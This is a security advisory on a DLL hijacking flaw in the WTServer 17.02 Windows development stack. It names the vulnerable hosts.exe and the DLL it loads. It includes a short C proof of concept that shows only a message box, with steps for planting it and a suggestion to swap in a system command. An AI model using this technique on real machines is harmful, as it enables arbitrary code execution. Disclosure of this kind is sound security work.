WTServer version 17.02 suffers from a dll hijacking vulnerability.
42f354f701a039d4b1f5f143f56c2b0fa06cd43c86ae75c3e5c03fa139903414
[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
Vendor:
===============
http://wtserver.wtriple.com/
Download:
===========
https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory
About Product:
===============
WTServer - Nginx MariaDB Redis Php development stack for Windows
A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.
Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*
Vulnerability Type:
===================
DLL Loading Arbitrary Code Execution.
Informations:
===================
The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".
POC:
===================
Download the POC from github and compile it with "CodeBlocks" or "GCC" .
https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b
Data:
// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe"
// For any informations contact me at: wassline@gmail.com
#include "main.h"
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}
- Download the POC and compile it and copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) .
CVE Reference:
===============
N/A
Tested on:
===============
Windows 7
Win xp